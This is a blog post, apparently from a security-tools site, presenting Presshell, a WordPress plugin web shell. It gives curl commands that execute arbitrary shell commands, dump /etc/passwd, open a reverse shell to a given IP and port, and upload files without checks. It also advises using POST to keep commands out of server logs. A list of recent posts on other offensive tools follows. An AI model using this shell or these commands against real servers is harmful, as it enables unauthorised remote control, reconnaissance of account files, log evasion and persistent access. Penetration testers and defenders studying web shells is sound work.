Kali Linux

Presshell : Quick And Dirty WordPress Command Execution Shell

Presshell is a tool for Quick & dirty WordPress Command Execution Shell. Execute shell commands on your wordpress server. Uploaded shell will probably be at <your-host>/wp-content/plugins/shell/shell.php

Installation

To install the shell, we are assuming you have administrative rights to WordPress and can install plugins since transferring a PHP file to the media library shouldn’t work anyway. Otherwise, you have a bigger problem.

Simply upload the zip file located in the Releases section as a new extension and you’re good to go.

Usage

Using the shell is straightforward. Simply pass sh commands as an argument to the shell :

❯ curl ‘http://host/…/shell.php?cmd=uname+-a’
Linux wordpress-server 2.6.32-21-generic-pae #
32-Ubuntu SMP Fri Apr 16 09:39:35 UTC 2010 i686 GNU/Linux

You may as well pass these arguments in a POST request, which is the recommended way to keep your commands out of logs.

❯ curl ‘http://host/…/shell.php’ –data-urlencode ‘cmd=ls’
LICENSE
README.md
shell.php

More complex commands are also supported, careful about your quoting though

❯ curl ‘http://host/…/shell.php’ –data-urlencode ‘cmd=cat /etc/passwd | grep -v “(false|nologin)”‘
root:x:0:0:root:/root:/bin/bash
sync:x:4:65534:sync:/bin:/bin/sync

❯ curl ‘http://host/…/shell.php’ –data-urlencode ‘cmd=python -c “from urllib.parse import urlencode; print(urlencode({\”cmd\”: \”uname -a\”}))”‘
cmd=uname+-a

You can also open a reverse shell using the ip and port parameters. The default port is 443.

❯ curl ‘http://host/…/shell.php’ –data-urlencode ‘ip=127.0.0.1’

❯ curl ‘http://host/…/shell.php’ –data-urlencode ‘ip=127.0.0.1’ –data-urlencode ‘port=1337’

There is also an option provided for convenience to upload a file to the directory of the plugin unconditionally and without checks.

❯ curl ‘http://host/…/shell.php’ -F ‘file=@some_file’
❯ curl ‘http://host/…/shell.php’ –data-urlencode ‘cmd=ls’
LICENSE
README.md
shell.php
some_file

R K

Recent Posts

How Does a Firewall Work Step by Step

How Does a Firewall Work Step by Step? What Is a Firewall and How Does…

23 hours ago

ROADTools: The Modern Azure AD Exploration Framework

ROADTools is a powerful framework designed for exploring and interacting with Microsoft Azure Active Directory…

4 days ago

How to Enumerate Microsoft 365 Groups Using PowerShell and Python

Microsoft 365 Groups (also known as M365 Groups or Unified Groups) are at the heart…

4 days ago

SeamlessPass: Using Kerberos Tickets to Access Microsoft 365

SeamlessPass is a specialized tool designed to leverage on-premises Active Directory Kerberos tickets to obtain…

5 days ago

PPLBlade: Advanced Memory Dumping and Obfuscation Tool

PPLBlade is a powerful Protected Process Dumper designed to capture memory from target processes, hide…

5 days ago

HikPwn : Simple Scanner For Hikvision Devices With Basic Vulnerability Scanning

HikPwn: Comprehensive Guide to Scanning Hikvision Devices for Vulnerabilities If you’re searching for an efficient…

6 days ago